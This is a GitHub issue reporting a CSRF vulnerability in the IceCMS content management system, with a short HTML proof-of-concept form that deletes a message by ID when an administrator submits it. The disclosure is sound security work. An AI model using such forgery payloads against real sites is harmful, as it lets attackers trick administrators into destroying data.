There is a CSRF vulnerability that can delete the message

Thecosy / IceCMS

🌈冰激凌内容管理系统🍦,实现MacWK资源站，社区图片视频圈子CMS，支持网页端移动端小程序🌟适合做资讯商城，社区论坛，聊天交友社区，博客，圈子，论坛，图片，视频，社交。

https://www.icecms.cn

GNU Affero General Public License v3.0

1.62k stars 237 forks source link

There is a CSRF vulnerability that can delete the message #17

Open topdayplus opened 1 year ago

topdayplus commented 1 year ago

After the administrator open the following page, and click the the Submit request, square message with ID 264 will be deleted.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.129:8181/square/DelectSquareById/264">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>